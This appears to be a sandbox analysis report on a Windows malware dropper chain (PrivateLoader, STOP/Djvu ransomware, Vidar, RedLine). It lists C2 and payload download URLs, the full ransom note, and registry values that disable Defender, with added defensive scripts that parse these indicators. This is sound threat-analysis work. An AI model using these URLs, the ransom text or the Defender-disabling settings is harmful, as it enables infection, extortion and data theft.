Analysis
max time kernel: 450s
max time network: 453s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 05-07-2022 10:59

Static task: static1
Behavioral task: behavioral1
  Sample: faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
  Resource: win10v2004-20220414-en
All memory/yara hits in the signature tables below reference behavioral2, the Windows 10 run.
General
Target: faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
Size: 732KB
MD5: 659ac9c3f3c0fffb292704cb5e7dd699
SHA1: a3ee2528280cd762c130f680af08583df22bb435
SHA256: faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd
SHA512: 0b99ae205eb06e39f0befef1c41776cbddda78e674c639eb51968bba4b70aad45cc7b0dbf4ad9bed12a7a82ac31943185b8f59aab082afb15d9b91924889db10
Malware Config

Extracted: privateloader
C2:
  http://212.193.30.45/proxies.txt
  http://85.202.169.116/server.txt
  pastebin.com/raw/A7dSG1te
  http://wfsdragon.ru/api/setStats.php
  85.202.169.116
  http://91.241.19.125/pub.php?pub=one
  http://sarfoods.com/index.php
  http://212.193.30.29/server.txt
  212.193.30.21
payload_url (as extracted; random.exe, askinstall23.exe and casper2.exe are listed twice):
  http://193.233.185.125/download/NiceProcessX64.bmp
  http://193.233.185.125/download/NiceProcessX32.bmp
  https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
  https://c.xyzgamec.com/userdown/2202/random.exe
  http://193.56.146.76/Proxytest.exe
  http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
  http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
  http://luminati-china.xyz/aman/casper2.exe
  https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
  http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
  https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
  https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
  https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
  http://185.215.113.208/ferrari.exe
  https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
  https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
  https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
  https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
  https://c.xyzgamec.com/userdown/2202/random.exe
  http://mnbuiy.pw/adsli/note8876.exe
  http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
  http://luminati-china.xyz/aman/casper2.exe
  https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
  http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
  https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
  https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
  https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
  https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
  https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp
  http://64.227.67.0/searchApp.exe
The .bmp names on cdn.discordapp.com are executables served with an image extension, not pictures.

Extracted: djvu
C2: http://acacaca.org/test3/get.php
extension: .eiur
offline_id: JPKXWc5eWNjIicWmQyJxv6NCjbH02qrKi0af9Zt1
payload_url:
  http://rgyui.top/dl/build2.exe
  http://acacaca.org/files/1/build3.exe
ransomnote: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-aMsnHoiJcO Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0510Usjdjs
The offline_id ends in t1, the marker STOP/Djvu uses for its hard-coded offline key: files encrypted while get.php on acacaca.org was unreachable were encrypted with that key rather than a per-victim key from the C2. build2.exe and build3.exe are the secondary payloads the ransomware fetches (build2.exe appears below as a dropped, self-injecting process).

Extracted: vidar
version: 53.1
profile_id: 1448
C2:
  https://t.me/tg_dailyrunnings
  https://mastodon.online/@olegf9844g

Extracted: vidar
version: 53
profile_id: 937
C2:
  https://t.me/ch_inagroup
  https://mastodon.social/@olegf9844e
Both Vidar configs resolve their real C2 through profile pages on Telegram and Mastodon; the t.me/mastodon URLs are dead drops, not the C2 itself.

Extracted: redline
botnet: Lyla28.06
C2: 185.215.113.16:21921
auth_value: de24aa7fc89cb989c29bc8e2697f6d2a
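The configs above mix full URLs, scheme-less paths (pastebin.com/raw/...), bare IPs and host:port pairs, and repeat some payload URLs. The following script, added here as an example and not part of the report, turns a config block in the report's own "Extracted <family>" layout into a deduplicated, defanged indicator list split into attacker IPs, attacker domains and abused legitimate hosting. The excerpt embedded as input is a constructed subset of the report's own lines; the LEGIT_HOSTING set is my choice, taken from the services flagged under "Legitimate hosting services abused" below.

```python
"""Turn the extracted-config blocks of a sandbox report into a deduplicated,
defanged indicator list grouped by kind. Added example, not part of the report."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed excerpt: a subset of the Malware Config lines shown in this report,
# in the report's own layout ("Extracted <family>" followed by indicator lines).
CONFIG_EXCERPT = """\
Extracted privateloader
http://212.193.30.45/proxies.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
85.202.169.116
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
https://c.xyzgamec.com/userdown/2202/random.exe
Extracted djvu
http://acacaca.org/test3/get.php
http://rgyui.top/dl/build2.exe
Extracted vidar
https://t.me/tg_dailyrunnings
https://mastodon.online/@olegf9844g
Extracted redline
185.215.113.16:21921
"""

# Services the report lists under "Legitimate hosting services abused": these are
# dead-drop/staging hosts, so block the full URL or path, not the whole domain.
LEGIT_HOSTING = {"cdn.discordapp.com", "pastebin.com", "t.me",
                 "mastodon.online", "mastodon.social"}

# A URL with optional scheme, or a bare host / host:port.
INDICATOR_RE = re.compile(r"^(?:https?://)?[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/\S*)?$")


def parse_config(text):
    """Yield (family, indicator) for each indicator line under an 'Extracted <family>' heading."""
    family = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("Extracted "):
            family = line.split(maxsplit=1)[1]
        elif family and INDICATOR_RE.match(line):
            yield family, line


def split_indicator(indicator):
    """Return (host, port, path) for a URL, a bare host:port or a bare IP."""
    url = indicator if "://" in indicator else "http://" + indicator
    parts = urlsplit(url)
    return parts.hostname, parts.port, parts.path or "/"


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def defang(host):
    return host.replace(".", "[.]")


def build_indicators(text):
    """Group unique hosts by kind (ip, domain, legit_hosting); each host maps to the families using it."""
    out = {"ip": {}, "domain": {}, "legit_hosting": {}}
    seen = set()
    for family, raw in parse_config(text):
        host, port, path = split_indicator(raw)
        if (host, port, path) in seen:   # the report repeats some payload URLs
            continue
        seen.add((host, port, path))
        if is_ip(host):
            kind = "ip"
        elif host in LEGIT_HOSTING:
            kind = "legit_hosting"
        else:
            kind = "domain"
        out[kind].setdefault(host, set()).add(family)
    return out


def render(indicators):
    """One defanged line per host, grouped by kind, with the families that use it."""
    lines = []
    for kind in ("ip", "domain", "legit_hosting"):
        for host in sorted(indicators[kind]):
            families = ",".join(sorted(indicators[kind][host]))
            lines.append(f"{kind:14}{defang(host):36}{families}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(build_indicators(CONFIG_EXCERPT)))
```

Running it prints one line per host; the legit_hosting group is the one to turn into URL- or path-level blocks rather than domain blocks, since blocking cdn.discordapp.com or t.me outright is rarely acceptable.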
Signatures

Detected Djvu ransomware (10 IoCs)
yara rule family_djvu matched in memory:
  behavioral2/memory/3964-236-0x0000000002210000-0x000000000232B000-memory.dmp
  behavioral2/memory/4552-240-0x0000000000400000-0x0000000000537000-memory.dmp
  behavioral2/memory/4552-242-0x0000000000400000-0x0000000000537000-memory.dmp
  behavioral2/memory/4552-243-0x0000000000400000-0x0000000000537000-memory.dmp
  behavioral2/memory/4552-244-0x0000000000400000-0x0000000000537000-memory.dmp
  behavioral2/memory/4552-294-0x0000000000400000-0x0000000000537000-memory.dmp
  behavioral2/memory/5224-337-0x0000000000400000-0x0000000000537000-memory.dmp
  behavioral2/memory/5224-338-0x0000000000400000-0x0000000000537000-memory.dmp
  behavioral2/memory/5716-355-0x0000000000400000-0x0000000000537000-memory.dmp
  behavioral2/memory/5716-357-0x0000000000400000-0x0000000000537000-memory.dmp
PIDs 3964, 4552, 5224 and 5716 are all kdnmdIr2m3Z75rmoxMQY45zR.exe (see Executes dropped EXE). The 0x400000 hits are in the processes that appear as SetThreadContext targets below, i.e. the unpacked payload written over the image of a suspended copy; the 0x2210000 hit in 3964 is the decrypted payload in the parent before injection.

Djvu Ransomware
Ransomware which is a variant of the STOP family.

Windows Defender Real-Time Protection settings modified (14 registry IoCs)
Both the submitted sample (faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe) and s0NrNwyfXpxCyzS03I8CZcLq.exe create \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection and set each of these values (int) to "1":
  DisableRealtimeMonitoring
  DisableBehaviorMonitoring
  DisableOnAccessProtection
  DisableIOAVProtection
  DisableScanOnRealtimeEnable
  DisableRawWriteNotification
On a host with Defender Tamper Protection enabled these policy writes do not take effect, but they remain a high-fidelity detection: no legitimate installer sets all six.

Modifies visibility of file extensions in Explorer (2 TTPs, 1 IoC)
  Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" (process not recorded)

Modifies visibility of hidden/system files in Explorer (2 TTPs, 1 IoC)
  Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" (process not recorded)
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. WmiPrvSE.exe, however, is the parent of every process created through WMI (Win32_Process.Create), so for this parent the signature also fires on WMI-launched execution.
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: pid 5748, pid_target 4396, process rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

Suspicious use of NtCreateUserProcessOtherParentProcess (6 IoCs)
svchost.exe (PID 5248) created processes whose recorded parent is another process:
  PID 5248 created 1624: parent H4qQ5eq5WgfPy9pgenBRiiaH.exe
  PID 5248 created 4588: parent csrss.exe (3 rows)
  PID 5248 created 2892: parent f801950a962ddba14caaa44bf084b55c.exe (2 rows)
The creator is svchost.exe and the other-parent PIDs belong to dropped binaries. That is the pattern produced by the AppInfo (UAC elevation) service, which launches an elevated process on behalf of a requester and re-parents it to the requester, so these rows are consistent with the dropped binaries elevating through UAC in the sandbox rather than spoofing a parent themselves. csrss.exe here is the copy dropped to C:\Windows\rss\csrss.exe (see Drops file in Windows directory), not the system process.
Suricata alerts (one signature each)
  ET MALWARE Amadey CnC Check-In
  ET MALWARE Generic gate .php GET with minimal headers
  ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  ET MALWARE Sharik/Smoke CnC Beacon 11
  ET MALWARE Single char EXE direct download likely trojan (multiple families)
  ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  ET MALWARE Trojan Generic - POST To gate.php with no accept headers
  ET MALWARE Trojan Generic - POST To gate.php with no referer
  ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
  ET MALWARE W32/Agent.OGR!tr.pws Stealer
  ET MALWARE Win32/Colibri Loader Activity
  ET MALWARE Win32/Colibri Loader Activity M2
  ET MALWARE Win32/Colibri Loader Activity M3
  ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
  ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
  ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
  ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
  ET MALWARE Win32/Vodkagats Loader Requesting Payload
The Amadey, SmokeLoader (Sharik/Smoke), Colibri, Socelars and Vodkagats alerts name families for which no config was extracted above; the network signatures are the only evidence of them in this run.
Vidar Stealer (6 IoCs)
yara rule family_vidar matched in memory:
  behavioral2/memory/2284-258-0x0000000000BB0000-0x0000000000BFD000-memory.dmp
  behavioral2/memory/2284-259-0x0000000000400000-0x0000000000A96000-memory.dmp
  behavioral2/memory/2284-304-0x0000000000400000-0x0000000000A96000-memory.dmp
  behavioral2/memory/3244-265-0x0000000000BE0000-0x0000000000C2D000-memory.dmp
  behavioral2/memory/3244-268-0x0000000000400000-0x0000000000A94000-memory.dmp
  behavioral2/memory/3244-305-0x0000000000400000-0x0000000000A94000-memory.dmp
PID 2284 is l2S7FrWODIlvtiOh9PM4XNlS.exe and PID 3244 is FzbLA0y21wf4Eb_GXZGPAkPK.exe: two Vidar instances, matching the two extracted Vidar configs.

Blocklisted process makes network request (2 IoCs)
  flow 180: pid 4688 RunDll32.exe
  flow 280: pid 4832 rundll32.exe
PID 4688 is the RunDll32.exe instance that M52CB.exe injected into via SetThreadContext (see below).

Downloads MZ/PE file

Executes dropped EXE (64 IoCs)
pid process
  4436 1hObAWF58hoo9_jA8jPWtwDx.exe
  4052 EYGVHMYze8w9bXCxKAs0sRH8.exe
  3704 sd1gX57A0wItT05S8cNnJS6P.exe
  2948 4AqwIgOuAzGydA7_h8I9ZZtr.exe
  1744 wd1PHHYFXTO2GwSbYNeKiEhd.exe
  2520 jtfXiAYn71DsfeALHUTabEl4.exe
  3244 FzbLA0y21wf4Eb_GXZGPAkPK.exe
  3964 kdnmdIr2m3Z75rmoxMQY45zR.exe
  1216 Kog456fPoi_qlj0gOuQ1ue72.exe
  2712 CzOCCnZhsTntOC1DD4Afra50.exe
  3680 HNYUwmuil6MtmEKe7lmDsMC3.exe
  4040 vl16pz8ikehSoCEiO6vpU86F.exe
  3232 _az72zCJh0iBWr5dTACKXrws.exe
  2284 l2S7FrWODIlvtiOh9PM4XNlS.exe
  4316 FnPK_uULTBfwZezEEGCXaVE6.exe
  1624 H4qQ5eq5WgfPy9pgenBRiiaH.exe
  5060 TUsKZ9i3PovwwAgsSaLpghkJ.exe
  2020 jtfXiAYn71DsfeALHUTabEl4.exe
  4960 SETUP_~2.EXE
  4552 kdnmdIr2m3Z75rmoxMQY45zR.exe
  3840 _az72zCJh0iBWr5dTACKXrws.exe
  1808 s0NrNwyfXpxCyzS03I8CZcLq.exe
  2616 M52CB.exe
  4688 RunDll32.exe
  3784 0BB4J.exe
  4204 0BB4J.exe
  4324 kdnmdIr2m3Z75rmoxMQY45zR.exe
  5224 kdnmdIr2m3Z75rmoxMQY45zR.exe
  5536 EH46E.exe
  5584 kdnmdIr2m3Z75rmoxMQY45zR.exe
  5640 3A2F1MAI23B9J52.exe
  5716 kdnmdIr2m3Z75rmoxMQY45zR.exe
  4116 build2.exe
  3516 sd1gX57A0wItT05S8cNnJS6P.exe
  5624 build2.exe
  5800 50543188494393494002.exe
  3288 bguuwe.exe
  3284 H4qQ5eq5WgfPy9pgenBRiiaH.exe
  3608 Ju38t3w5U8IOhBMX5rcSC6Nn.exe
  968 uw5KPJ6a18gzLPne_F5e0c1_.exe
  5344 mNDcgp0zrWGy_iR_gqWvo4tt.exe
  5396 BvEl9bplplH_zds3oc3G9TH2.exe
  5436 tmRoymsFOt7qgiIyaQJKTG0D.exe
  5408 7oi_eeupjsnLrsVJ1cvYAxm7.exe
  1424 Itvrzxmax2.exe
  5996 BvEl9bplplH_zds3oc3G9TH2.exe
  4192 Install.exe
  2200 Install.exe
  4320 0B7121CH132B0JI.exe
  4588 csrss.exe
  796 injector.exe
  4452 3A8A.exe
  1260 4A1B.exe
  5340 4A1B.exe
  3880 4A1B.exe
  6116 tor.exe
  6076 4A1B.exe
  3204 6DF1.exe
  4040 jwzeqsilllyafcnn.exe
  3180 DllHelper.exe
  4980 build2.exe
  3484 7BCD.exe
  4052 reg.exe
  2596 IHH9FGG6KIID6CG.exe
The list is capped at 64 rows; PIDs such as 4040 and 4052 appear twice because they were reused during the 450 s run.
Modifies Windows Firewall (1 TTP, 1 IoC)

UPX-packed files (yara rule upx, 10 IoCs)
  C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe (2 hits)
  C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe (3 hits)
  behavioral2/memory/1624-190-0x0000000000400000-0x0000000000C96000-memory.dmp
  behavioral2/memory/1624-286-0x0000000000400000-0x0000000000C96000-memory.dmp
  behavioral2/memory/2020-228-0x0000000000C80000-0x0000000000CD9000-memory.dmp
  behavioral2/memory/2520-167-0x0000000000C80000-0x0000000000CD9000-memory.dmp
  behavioral2/memory/2520-285-0x0000000000C80000-0x0000000000CD9000-memory.dmp
PID 1624 is H4qQ5eq5WgfPy9pgenBRiiaH.exe; PIDs 2020 and 2520 are jtfXiAYn71DsfeALHUTabEl4.exe. C:\Users\Admin\Pictures\Adobe Films\ is the drop directory the PrivateLoader stage uses for its payloads.
Checks BIOS information in registry (2 TTPs, 1 IoC)
BIOS information is often read in order to detect sandboxing environments.
  Install.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Checks computer location settings (2 TTPs, 23 IoCs)
Looks up country code configured in the registry, likely geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation, by:
  50543188494393494002.exe
  BvEl9bplplH_zds3oc3G9TH2.exe
  uw5KPJ6a18gzLPne_F5e0c1_.exe
  Install.exe
  6DF1.exe
  SETUP_~2.EXE
  Kog456fPoi_qlj0gOuQ1ue72.exe
  EH46E.exe
  HNYUwmuil6MtmEKe7lmDsMC3.exe
  7BCD.exe
  faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
  l2S7FrWODIlvtiOh9PM4XNlS.exe
  Ju38t3w5U8IOhBMX5rcSC6Nn.exe
  bguuwe.exe
  4A1B.exe (2 processes)
  sd1gX57A0wItT05S8cNnJS6P.exe
  s0NrNwyfXpxCyzS03I8CZcLq.exe
  FzbLA0y21wf4Eb_GXZGPAkPK.exe
  3A8A.exe
  EYGVHMYze8w9bXCxKAs0sRH8.exe
  kdnmdIr2m3Z75rmoxMQY45zR.exe (2 processes)

Loads dropped DLL (64 IoCs)
pid process (number of loads)
  2020 jtfXiAYn71DsfeALHUTabEl4.exe (15)
  5044 Conhost.exe (2)
  2284 l2S7FrWODIlvtiOh9PM4XNlS.exe (2)
  5156 rundll32.exe (2)
  5348 WerFault.exe (2)
  3244 FzbLA0y21wf4Eb_GXZGPAkPK.exe (3)
  5624 build2.exe (2)
  5532 rundll32.exe (2)
  5512 rundll32.exe (1)
  6036 rundll32.exe (2)
  4832 rundll32.exe (1)
  6116 tor.exe (7)
  1088 EF2C.exe (15)
  109296 Tal.exe.pif (3)
  109144 Tal.exe.pif (5)
The 15 loads by jtfXiAYn71DsfeALHUTabEl4.exe (2020) are consistent with a PyInstaller bundle unpacking its runtime DLLs (see Detects Pyinstaller below); the 7 loads by tor.exe show a bundled Tor client being started.
Modifies file permissions (1 TTP, 1 IoC)

Reads local data of messenger clients (2 TTPs)
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Uses the VBS compiler for execution (1 TTP)
vbc.exe appears below as the SetThreadContext target of CE07.exe, i.e. it hosts an injected payload rather than compiling anything.

Accesses Microsoft Outlook profiles (1 TTP, 1 IoC)
  rundll32.exe: Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 13 IoCs)
HKCU below is \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000; HKLM is \REGISTRY\MACHINE.
  0BB4J.exe: Set value (str) HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"
  SETUP_~2.EXE: Set value (str) HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wzocvkk = "\"C:\\Users\\Admin\\AppData\\Roaming\\Okjeqdz\\Wzocvkk.exe\""
  signed.exe: Key created HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  signed.exe: Set value (str) HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Driver Service = "C:\\ProgramData\\MsDrvSrvc.exe"
  kdnmdIr2m3Z75rmoxMQY45zR.exe: Set value (str) HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\72bf7303-5dc0-44e9-87d8-698f8677acab\\kdnmdIr2m3Z75rmoxMQY45zR.exe\" --AutoStart"
  H4qQ5eq5WgfPy9pgenBRiiaH.exe: Set value (str) HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""
  csrss.exe: Set value (str) HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""
  CzOCCnZhsTntOC1DD4Afra50.exe: Key created HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce
  CzOCCnZhsTntOC1DD4Afra50.exe: Set value (str) HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""
  mNDcgp0zrWGy_iR_gqWvo4tt.exe: Key created HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce
  mNDcgp0zrWGy_iR_gqWvo4tt.exe: Set value (str) HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""
  FnPK_uULTBfwZezEEGCXaVE6.exe: Key created HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  FnPK_uULTBfwZezEEGCXaVE6.exe: Set value (str) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""
The three wextract_cleanup RunOnce values are the standard cleanup stub written by the Windows IExpress/wextract self-extractor (advpack.dll DelNodeRunDLL32 deletes the IXP00n.TMP extraction directory at next logon); they show that CzOCCnZhsTntOC1DD4Afra50.exe, mNDcgp0zrWGy_iR_gqWvo4tt.exe and FnPK_uULTBfwZezEEGCXaVE6.exe are IExpress-style SFX packages, not persistence. The remaining Run values are persistence proper: SysHelper with --AutoStart under an AppData\Local\<GUID> directory belongs to kdnmdIr2m3Z75rmoxMQY45zR.exe, the process matched by family_djvu; the csrss value points at the dropped C:\Windows\rss\csrss.exe, and Steam and Microsoft Driver Service masquerade as legitimate software.
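The registry IoCs in this report come in two shapes, 'Set value (<type>) <key>\<name> = "<data>" <process>' and 'Key created <key> <process>', and the interesting ones fall into a few classes: the Windows Defender Real-Time Protection policy writes, the Explorer HideFileExt/ShowSuperHidden changes, Run/RunOnce persistence, and the wextract_cleanup entries that are a self-extractor artefact rather than persistence. The following script, added here as an example and not part of the report, parses those lines and classifies them per process so the Defender tampering and the real persistence entries can be separated from the SFX noise. The embedded sample is a constructed subset of the report's own lines (the HideFileExt line deliberately carries no process name, as on the page); the class names and the rule that treats wextract_cleanup + DelNodeRunDLL32 as benign are mine.

```python
"""Classify registry IoC lines from a sandbox report into Defender tampering,
Explorer visibility changes, Run/RunOnce persistence and self-extractor
cleanup entries. Added example, not report code."""
import re
from collections import Counter, defaultdict

# Constructed sample: a few IoC lines from this report, in the report's own
# 'Set value (<type>) <key>\<name> = "<data>" <process>' / 'Key created <key> <process>' form.
SAMPLE_IOCS = r'''
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" s0NrNwyfXpxCyzS03I8CZcLq.exe
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection s0NrNwyfXpxCyzS03I8CZcLq.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0"
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\72bf7303-5dc0-44e9-87d8-698f8677acab\\kdnmdIr2m3Z75rmoxMQY45zR.exe\" --AutoStart" kdnmdIr2m3Z75rmoxMQY45zR.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" H4qQ5eq5WgfPy9pgenBRiiaH.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" CzOCCnZhsTntOC1DD4Afra50.exe
'''

# Key and value name never contain a double quote, so [^"] keeps the key match
# out of the quoted data; the trailing process token is optional.
SET_RE = re.compile(r'^Set value \((\w+)\) (\\REGISTRY\\[^"]+)\\([^\\"]+) = "(.*)"(?:\s+(\S+))?$')
KEY_RE = re.compile(r'^Key created (\\REGISTRY\\.+?)(?:\s+(\S+\.(?:exe|EXE|pif)))?$')

DEFENDER_RTP = r"\Policies\Microsoft\Windows Defender\Real-Time Protection"
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$")


def parse_line(line):
    """Return a dict for a 'Set value' or 'Key created' IoC line, or None."""
    m = SET_RE.match(line)
    if m:
        vtype, key, name, data, proc = m.groups()
        return {"op": "set", "key": key, "name": name, "data": data, "process": proc or "<unknown>"}
    m = KEY_RE.match(line)
    if m:
        key, proc = m.groups()
        return {"op": "create", "key": key, "name": None, "data": None, "process": proc or "<unknown>"}
    return None


def classify(rec):
    """Map one parsed IoC to a finding kind."""
    key = rec["key"]
    if key.endswith(DEFENDER_RTP):
        # Creating the policy key, or setting any Disable* value to 1, is tampering.
        if rec["op"] == "create" or (rec["name"].startswith("Disable") and rec["data"] == "1"):
            return "defender_tamper"
    if key.endswith(r"\Explorer\Advanced") and rec["name"] in ("HideFileExt", "ShowSuperHidden"):
        return "explorer_visibility"
    if RUN_KEY_RE.search(key) and rec["op"] == "set":
        # wextract_cleanupN + advpack.dll,DelNodeRunDLL32 is the IExpress/wextract
        # self-extractor's cleanup stub, not attacker persistence.
        if rec["name"].startswith("wextract_cleanup") and "DelNodeRunDLL32" in rec["data"]:
            return "sfx_cleanup"
        return "persistence_run"
    return "other"


def analyze(text):
    """Return {process: Counter(kind)} over all parseable lines."""
    per_process = defaultdict(Counter)
    for line in text.splitlines():
        rec = parse_line(line.strip())
        if rec:
            per_process[rec["process"]][classify(rec)] += 1
    return per_process


if __name__ == "__main__":
    for proc, kinds in analyze(SAMPLE_IOCS).items():
        print(f"{proc}: {dict(kinds)}")
```

The same classifier applied to the full tables above yields seven defender_tamper findings for each of the two Defender-tampering processes, one persistence_run each for 0BB4J.exe, SETUP_~2.EXE, signed.exe, kdnmdIr2m3Z75rmoxMQY45zR.exe, H4qQ5eq5WgfPy9pgenBRiiaH.exe and csrss.exe, and sfx_cleanup for the three IExpress droppers.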
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

